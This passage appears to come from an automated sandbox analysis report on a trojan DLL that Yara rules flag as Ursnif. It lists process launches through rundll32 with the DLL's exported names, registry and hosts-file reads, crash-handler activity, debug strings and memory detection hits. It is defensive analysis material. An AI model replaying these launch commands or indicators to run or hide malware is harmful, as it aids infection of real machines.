                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E523CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E50B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E52FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E51A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E52FB98
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4FE8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E4D5600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E50D630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E523CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E50B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E51A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E4FE8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E4FAEC0 appears 38 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E508487 appears 34 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E4FABD1 appears 182 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C23D5 NtQueryVirtualMemory,
                      Source: 6yDD19jMIu.dllVirustotal: Detection: 9%
                      Source: 6yDD19jMIu.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 636
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 636
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 640
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE20.tmpJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@14/12@26/9
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4040
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess892
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1820
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: 6yDD19jMIu.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 6yDD19jMIu.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb& source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb7 source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.464515303.0000000005490000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000013.00000003.471624682.00000000051F2000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474313547.0000000005861000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497779494.0000000005404000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: WinTypes.pdbT) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbD source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465473055.00000000035AC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.477462780.000000000324C000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb; source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb0 source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000013.00000003.471624682.00000000051F2000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474313547.0000000005861000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497779494.0000000005404000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdby' source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbN source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdbf) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbM source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdbR source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb* source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465197464.00000000035B8000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdb, source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbz source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000013.00000003.463108056.0000000002D40000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465473055.00000000035AC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.477462780.000000000324C000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbR source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbX) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbg source: WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbX source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbN source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdbl) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb1 source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdb> source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.775494976.000000006E53B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776806344.000000006E53B000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.471242410.000000006E53B000.00000002.00020000.sdmp, 6yDD19jMIu.dll
                      Source: Binary string: advapi32.pdbH source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbN source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000013.00000003.463129538.0000000002D4C000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465197464.00000000035B8000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000013.00000003.464251828.0000000002D46000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465353270.00000000035B2000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp
                      Source: Binary string: sfc.pdbd source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbd source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb\ source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C2150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C21A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4FAB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4FAB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E4FAB9A push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C1DE5 LoadLibraryA,GetProcAddress,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477283953.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484141352.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477436654.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.478270609.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.619486334.000000000321F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.528112034.000000000341B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.567583094.00000000049BD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.776401255.0000000004840000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.521826421.0000000004ABB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484353267.0000000003598000.00000004.00000040.sdmp, type: MEMORY
